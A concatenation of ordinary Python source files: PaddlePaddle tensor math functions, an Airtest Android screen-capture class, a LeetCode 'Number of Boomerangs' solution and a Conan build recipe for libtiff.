check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'lerp')
check_variable_and_dtype(y, 'y', ['float32', 'float64'], 'lerp')
check_variable_and_dtype(weight, 'weight', ['float32', 'float64'], 'lerp')
helper = LayerHelper('lerp', **locals())
inputs = {'X': x, 'Y': y, 'Weight': weight}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='lerp', inputs=inputs, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def lerp_(x, y, weight, name=None):
r"""
Inplace version of ``lerp`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_lerp`.
"""
out_shape = broadcast_shape(x.shape, y.shape)
check_type(weight, 'weight', (float, paddle.Tensor, Variable), 'lerp')
if isinstance(weight, float):
weight = paddle.to_tensor([weight], dtype=x.dtype)
elif isinstance(weight, (paddle.Tensor, Variable)):
out_shape = broadcast_shape(out_shape, weight.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
return _C_ops.lerp_(x, y, weight)
def rad2deg(x, name=None):
"""
Convert each of the elements of input x from angles in radians to degrees.
Equation:
.. math::
rad2deg(x)=180/ \pi * x
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type is the same with input (The output data type is float32 when the input data type is int).
Examples:
.. code-block:: python
import paddle
import numpy as np
x1 = paddle.to_tensor([3.142, -3.142, 6.283, -6.283, 1.570, -1.570])
result1 = paddle.rad2deg(x1)
print(result1)
# Tensor(shape=[6], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [180.02334595, -180.02334595, 359.98937988, -359.98937988,
# 9.95437622 , -89.95437622])
x2 = paddle.to_tensor(np.pi/2)
result2 = paddle.rad2deg(x2)
print(result2)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [90.])
x3 = paddle.to_tensor(1)
result3 = paddle.rad2deg(x3)
print(result3)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [57.29578018])
"""
rad2deg_scale = 180 / np.pi
if in_dygraph_mode():
if convert_dtype(x.dtype) in ['int32', 'int64']:
x = cast(x, dtype="float32")
return _C_ops.scale(x, 'scale', rad2deg_scale)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'], 'rad2deg')
helper = LayerHelper('rad2deg', **locals())
out_cast = x
if convert_dtype(x.dtype) in ['int32', 'int64']:
out_cast = helper.create_variable_for_type_inference(dtype=paddle.float32)
helper.append_op(
type='cast', inputs={'X':x}, outputs={'Out': out_cast}, attrs={'in_dtype': x.dtype,'out_dtype': paddle.float32})
out = helper.create_variable_for_type_inference(dtype=out_cast.dtype)
helper.append_op(
type='scale', inputs={'X':out_cast}, outputs={'Out': out}, attrs={'scale': rad2deg_scale})
return out
def deg2rad(x, name=None):
"""
Convert each of the elements of input x from degrees to angles in radians.
Equation:
.. math::
deg2rad(x)=\pi * x / 180
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type is the same with input (The output data type is float32 when the input data type is int).
Examples:
.. code-block:: python
import paddle
import numpy as np
x1 = paddle.to_tensor([180.0, -180.0, 360.0, -360.0, 90.0, -90.0])
result1 = paddle.deg2rad(x1)
print(result1)
# Tensor(shape=[6], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [3.14159274, -3.14159274, 6.28318548, -6.28318548, 1.57079637,
# -1.57079637])
x2 = paddle.to_tensor(180)
result2 = paddle.deg2rad(x2)
print(result2)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [3.14159274])
"""
deg2rad_scale = np.pi / 180.0
if in_dygraph_mode():
if convert_dtype(x.dtype) in ['int32', 'int64']:
x = cast(x, dtype="float32")
return _C_ops.scale(x, 'scale', deg2rad_scale)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'], 'deg2rad')
helper = LayerHelper('deg2rad', **locals())
out_cast = x
if convert_dtype(x.dtype) in ['int32', 'int64']:
out_cast = helper.create_variable_for_type_inference(dtype=paddle.float32)
helper.append_op(
type='cast', inputs={'X':x}, outputs={'Out': out_cast}, attrs={'in_dtype': x.dtype,'out_dtype': paddle.float32})
out = helper.create_variable_for_type_inference(dtype=out_cast.dtype)
helper.append_op(
type='scale', inputs={'X':out_cast}, outputs={'Out': out}, attrs={'scale': deg2rad_scale})
return out
def diff(x, n=1, axis=-1, prepend=None, append=None, name=None):
r"""
Computes the n-th forward difference along the given axis.
The first-order differences is computed by using the following formula:
.. math::
out[i] = x[i+1] - x[i]
Higher-order differences are computed by using paddle.diff() recursively.
Only n=1 is currently supported.
Args:
x(Tensor): The input tensor to compute the forward difference on
n(int, optional): The number of times to recursively compute the difference.
Only support n=1. Default:1
axis(int, optional): The axis to compute the difference along. Default:-1
prepend(Tensor, optional): The tensor to prepend to input along axis before computing the difference.
It's dimensions must be equivalent to that of x,
and its shapes must match x's shape except on axis.
append(Tensor, optional): The tensor to append to input along axis before computing the difference,
It's dimensions must be equivalent to that of x,
and its shapes must match x's shape except on axis.
name(str|None): A name for this layer(optional). If set None,
the layer will be named automatically.
Returns:
Tensor: The output tensor with same dtype with x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 4, 5, 2])
out = paddle.diff(x)
print(out)
# out:
# [3, 1, -3]
y = paddle.to_tensor([7, 9])
out = paddle.diff(x, append=y)
print(out)
# out:
# [3, 1, -3, 5, 2]
z = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
out = paddle.diff(z, axis=0)
print(out)
# out:
# [[3, 3, 3]]
out = paddle.diff(z, axis=1)
print(out)
# out:
# [[1, 1], [1, 1]]
"""
if axis < 0:
axis = axis + len(x.shape)
if axis > len(x.shape):
axis = len(x.shape)
if axis < 0:
axis = 0
dtype = x.dtype
axes = [axis]
infer_flags = list(1 for i in range(len(axes)))
if in_dygraph_mode():
has_pend = False
input_list = []
if prepend is not None and append is not None:
input_list = [prepend, x, append]
has_pend = True
elif prepend is not None:
input_list = [prepend, x]
has_pend = True
elif append is not None:
input_list = [x, append]
has_pend = True
if has_pend:
new_input = _C_ops.concat(input_list, 'axis', axis)
else:
new_input = x
attrs_1 = ()
attrs_2 = ()
dim_len = new_input.shape[axis]
starts_1 = [0]
attrs_1 += ('starts', starts_1)
ends_1 = [dim_len - 1]
attrs_1 += ('ends', ends_1)
input_front = _C_ops.slice(new_input, None, None, 'axes', axes, \
'infer_flags', infer_flags, *attrs_1)
starts_2 = [1]
attrs_2 += ('starts', starts_2)
ends_2 = [dim_len]
attrs_2 += ('ends', ends_2)
input_back = _C_ops.slice(new_input, None, None, 'axes', axes, \
'infer_flags', infer_flags, *attrs_2)
if x.dtype == paddle.bool:
op = getattr(_C_ops, "logical_xor")
out = op(input_back, input_front)
else:
out = layers.elementwise_sub(input_back, input_front, axis=axis)
return out
else:
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'bool', 'int32', 'int64'], 'diff')
check_type(axis, 'axis', (int), 'diff')
helper = LayerHelper('diff', **locals())
has_pend = False
input_list = []
if prepend is not None and append is not None:
input_list = [prepend, x, append]
has_pend = True
elif prepend is not None:
input_list = [prepend, x]
has_pend = True
elif append is not None:
input_list = [x, append]
has_pend = True
if has_pend:
new_input = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='concat', inputs={'X': input_list}, outputs={'Out': [new_input]}, attrs={'axis': axis}
)
else:
new_input = x
dim_len = new_input.shape[axis]
attrs_1 = {'axes': axes}
starts_1 = [0]
ends_1 = [dim_len - 1]
attrs_1['starts'] = starts_1
attrs_1['ends'] = ends_1
input_front = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='slice', inputs={'Input': new_input}, attrs=attrs_1, outputs={'Out': input_front}
)
attrs_2 = {'axes': axes}
starts_2 = [1]
ends_2 = [dim_len]
attrs_2['starts'] = starts_2
attrs_2['ends'] = ends_2
input_back = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='slice', inputs={'Input': new_input}, attrs=attrs_2, outputs={'Out': input_back}
)
if dtype == paddle.bool:
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='logical_xor', inputs={"X": input_back, "Y": input_front}, outputs={"Out": out}
)
else:
out = layers.elementwise_sub(input_back, input_front, axis=axis)
return out
def angle(x, name=None):
r"""
Element-wise angle of complex numbers. For non-negative real numbers, the angle is 0 while
for negative real numbers, the angle is :math:`\pi`.
Equation:
.. math::
angle(x)=arctan2(x.imag, x.real)
Args:
x (Tensor): An N-D Tensor, the data type is complex64, complex128, or float32, float64 .
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): y (Tensor): An N-D Tensor of real data type with the same precision as that of x's data type.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-2, -1, 0, 1]).unsqueeze(-1).astype('float32')
y = paddle.to_tensor([-2, -1, 0, 1]).astype('float32')
z = x + 1j * y
print(z.numpy())
# [[-2.-2.j -2.-1.j -2.+0.j -2.+1.j]
# [-1.-2.j -1.-1.j -1.+0.j -1.+1.j]
# [ 0.-2.j 0.-1.j 0.+0.j 0.+1.j]
# [ 1.-2.j 1.-1.j 1.+0.j 1.+1.j]]
theta = paddle.angle(z)
print(theta.numpy())
# [[-2.3561945 -2.6779451 3.1415927 2.6779451]
# [-2.0344439 -2.3561945 3.1415927 2.3561945]
# [-1.5707964 -1.5707964 0. 1.5707964]
# [-1.1071488 -0.7853982 0. 0.7853982]]
"""
if in_dygraph_mode():
return _C_ops.angle(x)
check_variable_and_dtype(x, 'x',
['float32', 'float64', 'complex64', 'complex128'], 'angle')
op_type = "angle"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_complex_to_real_dtype(x.dtype))
outputs = {"Out": out}
helper.append_op(type=op_type, inputs=inputs, outputs=outputs)
return out
|
# -*- coding: utf-8 -*-
from airtest.utils.logger import get_logger
from airtest.utils.safesocket import SafeSocket
from airtest.utils.nbsp import NonBlockingStreamReader
from airtest.utils.snippet import on_method_ready, reg_cleanup
from airtest.core.android.yosemite import Yosemite
import struct
LOGGING = get_logger(__name__)
class Javacap(Yosemite):
"""
This is another screencap class, it is slower in performance than minicap, but it provides the better compatibility
"""
APP_PKG = "com.netease.nie.yosemite"
SCREENCAP_SERVICE = "com.netease.nie.yosemite.Capture"
RECVTIMEOUT = None
def __init__(self, adb):
super(Javacap, self).__init__(adb)
self.frame_gen = None
@on_method_ready('install_or_upgrade')
def _setup_stream_server(self):
"""
Setup stream server
Returns:
adb shell process, non-blocking stream reader and local port
"""
localport, deviceport = self.adb.setup_forward("localabstract:javacap_{}".format)
deviceport = deviceport[len("localabstract:"):]
# setup agent proc
apkpath = self.adb.path_app(self.APP_PKG)
cmds = ["CLASSPATH=" + apkpath, 'exec', 'app_process', '/system/bin', self.SCREENCAP_SERVICE,
"--scale", "100", "--socket", "%s" % deviceport, "-lazy", "2>&1"]
proc = self.adb.start_shell(cmds)
# check proc output
nbsp = NonBlockingStreamReader(proc.stdout, print_output=True, name="javacap_sever")
while True:
line = nbsp.readline(timeout=5.0)
if line is None:
raise RuntimeError("javacap server setup timeout")
if b"Capture server listening on" in line:
break
if b"Address already in use" in line:
raise RuntimeError("javacap server setup error: %s" % line)
reg_cleanup(proc.kill)
return proc, nbsp, localport
def get_frames(self):
"""
Get the screen frames
Returns:
None
"""
proc, nbsp, localport = self._setup_stream_server()
s = SafeSocket()
s.connect((self.adb.host, localport))
t = s.recv(24)
# javacap header
LOGGING.debug(struct.unpack("<2B5I2B", t))
stopping = False
while not stopping:
s.send(b"1")
# recv frame header, count frame_size
if self.RECVTIMEOUT is not None:
header = s.recv_with_timeout(4, self.RECVTIMEOUT)
else:
header = s.recv(4)
if header is None:
LOGGING.error("javacap header is None")
# recv timeout, if not frame updated, maybe screen locked
stopping = yield None
else:
frame_size = struct.unpack("<I", header)[0]
frame_data = s.recv(frame_size)
stopping = yield frame_data
LOGGING.debug("javacap stream ends")
s.close()
nbsp.kill()
proc.kill()
self.adb.remove_forward("tcp:%s" % localport)
def get_frame_from_stream(self):
"""
Get frame from the stream
Returns:
frame
"""
if self.frame_gen is None:
self.frame_gen = self.get_frames()
return self.frame_gen.send(None)
def teardown_stream(self):
"""
End stream
Returns:
None
"""
if not self.frame_gen:
return
try:
self.frame_gen.send(1)
except (TypeError, StopIteration):
pass
else:
LOGGING.warn("%s tear down failed" % self.frame_gen)
self.frame_gen = None
|
#
# @lc app=leetcode id=447 lang=python
#
# [447] Number of Boomerangs
#
# https://leetcode.com/problems/number-of-boomerangs/description/
#
# algorithms
# Easy (49.20%)
# Likes: 296
# Dislikes: 447
# Total Accepted: 54.7K
# Total Submissions: 109.6K
# Testcase Example: '[[0,0],[1,0],[2,0]]'
#
# Given n points in the plane that are all pairwise distinct, a "boomerang" is
# a tuple of points (i, j, k) such that the distance between i and j equals the
# distance between i and k (the order of the tuple matters).
#
# Find the number of boomerangs. You may assume that n will be at most 500 and
# coordinates of points are all in the range [-10000, 10000] (inclusive).
#
# Example:
#
#
# Input:
# [[0,0],[1,0],[2,0]]
#
# Output:
# 2
#
# Explanation:
# The two boomerangs are [[1,0],[0,0],[2,0]] and [[1,0],[2,0],[0,0]]
#
#
#
#
#
import math
class Solution(object):
def _numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
# Time Limit
result = []
distance = [[0] * len(points) for _ in range(len(points))]
for i in range(len(points)):
for j in range(i):
distance[i][j] = (points[i][0]-points[j][0])**2 + (points[i][1]-points[j][1])**2
# distance[i][j] = math.sqrt((points[i][0]-points[j][0])**2
# + (points[i][1]-points[j][1])**2)
distance[j][i] = distance[i][j]
for m in range(i):
if distance[i][j] == distance[i-1-m][j]:
result.append([points[i], points[j], points[i-1-m]])
result.append([points[i-1-m], points[j], points[i]])
for m in range(j):
if distance[i][j] == distance[i][j-1-m]:
result.append([points[j], points[i], points[j-1-m]])
result.append([points[j-1-m], points[i], points[j]])
return len(result)
def numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
conunt = 0
data = {}
for i in range(len(points)):
for j in range(i):
distance = (points[i][0]-points[j][0])**2 + (points[i][1]-points[j][1])**2
exts = data.get(distance)
if not exts:
data[distance] = [[i,j]]
else:
for ext in exts:
if ext[0] == i or ext[0] == j or ext[1] == i or ext[1] == j:
conunt += 2
data[distance].append([i,j])
return conunt
# if __name__ == '__main__':
# s = Solution()
# print s.numberOfBoomerangs([[0, 0], [1, 0], [2, 0]])
# print s.numberOfBoomerangs([[3327,-549],[9196,-8118],[7610,-9506],[5098,8392],[8582,7953],[1053,5802],[3847,2652],[7654,8355],[1614,-9409],[9986,5538],[4660,2944],[4528,-9512],[7483,-1455],[3422,-3966],[2037,-4456],[5107,-4635],[4996,655],[7247,2606],[1149,8697],[7350,6083],[3002,8403],[8238,6850],[1055,5892],[5205,9021],[2835,5191],[911,-2505],[4488,-4561],[7983,-1677],[336,-2243],[4358,-1274],[3302,9465],[4091,-5350],[120,7690],[3608,7622],[6388,-9042],[57,-610],[9361,8295],[6240,-3232],[540,7797],[2141,-6625],[9341,3053],[7223,3829],[4844,1558],[2152,-8467],[9316,6510],[259,-1030],[2327,-5650],[9972,8800],[2040,-6420],[2774,4780],[4538,-7169],[4171,-6101],[7479,-3237],[7019,-1981],[4561,-4488],[7746,254],[4917,4969],[4083,-238],[6528,-7413],[1295,-7804],[5450,-8446],[1166,-5871],[2256,-8862],[2929,-5704],[4718,2055],[5429,-4392],[4887,9600],[9507,-1282],[2715,2878],[6737,-6372],[8390,-9165],[3882,3308],[5805,4317],[9422,8685],[3257,-2931],[881,-1293],[8623,-1601],[2836,879],[5889,2118],[1527,607],[4173,-3044],[6215,5412],[2908,-7926],[4130,-8024],[1304,7219],[1956,-3954],[8055,5839],[5706,212],[6508,5128],[8897,9765],[2197,-3870],[8472,-2828],[4529,7661],[4403,-9582],[6131,-7717],[7377,-3344],[5591,9944],[2069,-5148],[8370,-7449],[6828,-3974],[6123,-1216],[2072,530],[975,-2221],[7094,-2516],[9259,-4009],[7249,7809],[8473,2074],[4981,-6998],[9735,5737],[9772,5866],[8020,-6499],[8874,-6389],[3445,-9057],[4815,8167],[9847,1643],[4193,2322],[6780,2617],[9204,4107],[396,6298],[1591,6008],[2289,-4807],[3817,762],[7267,5150],[116,-6646],[887,-3760],[5572,-4741],[9741,4446],[5223,-462],[1742,38],[7705,1589],[1682,-1750],[263,4814],[867,9467],[8921,7616],[5765,-3135],[3624,4406],[2058,-2559],[1520,-675],[2591,-2012],[2679,-169],[4228,-1749],[5090,-6031],[2697,-9687],[9859,791],[352,3916],[8732,-1614],[2166,8995],[3200,9385],[4814,-1527],[7001,579],[5338,-3023],[1337,-2604],[4418,-7143],[3073,3362],[845,-7896],[3193,-8575],[6707,4635],[1746,-595],[4949,1605],[6548,-8347],[1873,5281],[39,-5961],[4276,-409],[9777,-909],[8064,3130],[6022,-245],[108,7360],[7151,4526],[6569,-3423],[4240,-2585],[8681,-2567],[5192,5389],[2069,-3061],[1146,3370],[4896,7694],[5023,6770],[2975,-8586],[7161,-6396],[1005,6938],[2695,-4579],[69,-4931],[5176,177],[2429,-1320],[1055,8999],[5257,-4704],[2766,-6062],[9081,-2042],[5679,-2498],[1249,6825],[7224,-3854],[872,2247],[2916,-6153],[3661,-9923],[7451,-8982],[7016,6498],[6440,-6563],[1568,-8384],[9966,-9651],[296,1021],[9348,-8095],[2669,8466],[2196,-8249],[2777,7875],[5605,4026],[1053,-7170],[172,-8075],[1429,-6912],[5772,-8557],[9518,-424],[2461,2886],[2426,-1099],[6323,-6006],[6870,-3711],[696,3518],[3662,6396],[5424,-3668],[4863,7620],[4435,7640],[1847,-3608],[8018,-7100],[9222,-5457],[4825,7004],[3983,-3050],[8447,-6499],[2878,-9092],[6387,5304],[6162,-938],[5651,3032],[5351,6347],[2902,-4634],[2743,8326],[8050,-6042],[2298,-1163],[7950,-9502],[5229,-4031],[3398,-9196],[512,-5424],[7808,847],[7878,6255],[4349,7108],[7163,736],[8764,9677],[6151,-5585],[2709,-2146],[7114,5612],[3220,-3790],[290,-8730],[168,8941],[107,-5529],[9439,-8311],[440,9189],[2493,7304],[117,6653],[8151,-5653],[2908,8852],[1455,-3577],[5941,-3428],[6101,-7908],[7339,5162],[9946,-5546],[7126,9519],[7016,3769],[789,7184],[2710,-2751],[1655,-1499],[5290,-1553],[4042,-2217],[2103,-9488],[788,-3393],[1211,3696],[1811,9019],[6471,-2248],[5591,8924],[6196,2930],[4087,6143],[3736,7565],[5662,-9248],[1334,2803],[4289,-9604],[6404,2296],[8897,-8306],[7096,-708],[5829,9199],[6156,-3383],[2158,-2633],[6665,-9678],[6386,3137],[8074,1977],[2061,4271],[4908,-7500],[6766,4996],[66,8780],[5749,1400],[7935,38],[1797,-5660],[2334,7046],[2386,9430],[2690,-1784],[4982,-1154],[1185,3492],[6214,-2149],[3814,8952],[7340,8241],[930,-4247],[8864,2190],[8254,5630],[7186,-5328],[762,9287],[6072,8697],[9325,-5779],[9389,1660],[7620,-8224],[7442,-9690],[9992,-7576],[5509,7529],[2269,8075],[5380,-3917],[7027,-7280],[4324,-5691],[8474,3188],[6499,3080],[5170,-9962],[7752,5932],[9325,176],[982,-1349],[4398,371],[6663,-1630],[2147,-9543],[5032,8491],[9234,541],[6021,1503],[8616,7753],[3938,-8004],[6826,8263],[6305,-8348],[7803,9157],[4732,-674],[9195,-1164],[5258,8520],[9012,2592],[3523,-238],[2964,6538],[8132,1463],[3348,-6835],[6307,2582],[58,-7672],[437,5027],[6433,4375],[7023,3259],[8990,-6672],[4911,3146],[2485,-4005],[2472,8032],[4831,-5918],[2905,196],[6675,6428],[9958,9639],[9319,4443],[7454,-7333],[3960,3761],[1601,-9630],[2441,2038],[5397,-1125],[6413,2420],[8486,1756],[2101,3398],[4902,938],[5745,-2626],[5323,-3071],[1456,8228],[7125,-1869],[1008,3435],[4122,6679],[4230,1577],[9346,8190],[1690,947],[4913,4132],[9337,310],[3007,-4249],[9083,-8507],[7507,-2464],[1243,-7591],[4826,-3011],[6135,-9851],[3918,7591],[8377,-2605],[5723,-4262],[830,-3803],[2417,-8587],[7774,8116],[5955,9465],[5415,868],[9949,-5247],[1179,2956],[6856,6614],[801,-9285],[4150,8397],[9476,8976],[1738,-4389],[9126,2008],[3202,3855],[9403,-4723],[9593,6585],[1475,-7989],[7998,-4399],[127,306],[1418,-4458],[1174,1367],[6647,-7647],[4323,3503],[8967,1477],[4218,9469],[6226,3694],[8446,-2036],[9305,3924],[9972,8860],[7779,5727],[4137,-6275],[8664,1964],[5736,-6985],[7566,-7785],[3321,8984],[4109,4495],[352,757],[3201,1027],[4260,-1480],[8856,4831],[7990,-4918],[8525,-7212],[3046,-5817],[6712,-630],[3043,-5509],[1449,-6468],[8216,-3534],[5497,304],[9481,3063],[8871,9154],[8399,2981],[1,8751],[90,-6798],[6131,-9298],[8075,-5013],[5533,6065],[70,-9589],[5205,9468],[946,1917],[5191,-6011],[2760,-7008],[3873,7329],[9458,9370],[7633,5291],[8785,2857],[797,3537],[2190,-9201],[2288,-7720],[353,4771],[9334,-1572],[9759,1220],[845,-3819],[7983,6050],[2001,-1071],[4319,-2808],[9270,7080],[6537,3143],[4409,2347],[8866,8394],[7639,4003],[7603,4788],[7540,-207],[5587,6181],[8425,5941],[952,-5888],[721,-2937],[5332,-8433],[3244,-6685],[3969,5246],[2244,8289],[8790,-8486],[1721,-4673],[1009,-3870],[7675,9875],[876,-8334],[231,-1520],[6454,7771],[4625,2042],[304,9403],[4335,-8743],[3515,-4944],[4672,8847],[2975,7917],[8514,6945],[3163,758],[1586,1953],[8624,-6693],[7281,9633],[5789,1308],[5861,-6983],[2974,-3908],[7849,-572],[215,-7525]])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
import os
import shutil
class LibtiffConan(ConanFile):
name = "libtiff"
description = "Library for Tag Image File Format (TIFF)"
url = "https://github.com/conan-io/conan-center-index"
author = "Bincrafters <bincrafters@gmail.com>"
license = "MIT"
homepage = "http://www.simplesystems.org/libtiff"
topics = ("tiff", "image", "bigtiff", "tagged-image-file-format")
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {'shared': False, 'fPIC': True}
requires = "zlib/1.2.11"
_source_subfolder = "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
self.options.remove("fPIC")
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
tools.get(**self.conan_data["sources"][self.version])
os.rename('tiff-' + self.version, self._source_subfolder)
os.rename(os.path.join(self._source_subfolder, "CMakeLists.txt"),
os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"))
shutil.copy("CMakeLists.txt",
os.path.join(self._source_subfolder, "CMakeLists.txt"))
def build(self):
cmake = CMake(self)
cmake.definitions['CMAKE_INSTALL_LIBDIR'] = 'lib'
cmake.definitions['CMAKE_INSTALL_BINDIR'] = 'bin'
cmake.definitions['CMAKE_INSTALL_INCLUDEDIR'] = 'include'
cmake.definitions["lzma"] = False
cmake.definitions["jpeg"] = False
cmake.definitions["jbig"] = False
if self.options.shared and self.settings.compiler == "Visual Studio":
# https://github.com/Microsoft/vcpkg/blob/master/ports/tiff/fix-cxx-shared-libs.patch
tools.replace_in_file(os.path.join(self._source_subfolder, 'libtiff', 'CMakeLists.txt'),
r'set_target_properties(tiffxx PROPERTIES SOVERSION ${SO_COMPATVERSION})',
r'set_target_properties(tiffxx PROPERTIES SOVERSION ${SO_COMPATVERSION} '
r'WINDOWS_EXPORT_ALL_SYMBOLS ON)')
if self.settings.os == "Windows" and self.settings.compiler != "Visual Studio":
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"find_library(M_LIBRARY m)",
"if (NOT MINGW)\n find_library(M_LIBRARY m)\nendif()")
if self.version == '4.0.8':
# only one occurence must be patched. fixed in 4.0.9
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"if (UNIX)",
"if (UNIX OR MINGW)")
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"add_subdirectory(tools)\nadd_subdirectory(test)\nadd_subdirectory(contrib)\nadd_subdirectory(build)\n"
"add_subdirectory(man)\nadd_subdirectory(html)", "")
cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared
cmake.configure(source_folder=self._source_subfolder)
cmake.build()
cmake.install()
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses", ignore_case=True, keep_path=False)
tools.rmdir(os.path.join(self.package_folder, 'lib', 'pkgconfig'))
def package_info(self):
self.cpp_info.libs = ["tiff", "tiffxx"]
if self.settings.os == "Windows" and self.settings.build_type == "Debug" and self.settings.compiler == 'Visual Studio':
self.cpp_info.libs = [lib+'d' for lib in self.cpp_info.libs]
if self.options.shared and self.settings.os == "Windows" and self.settings.compiler != 'Visual Studio':
self.cpp_info.libs = [lib+'.dll' for lib in self.cpp_info.libs]
if self.settings.os == "Linux":
self.cpp_info.libs.append("m")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.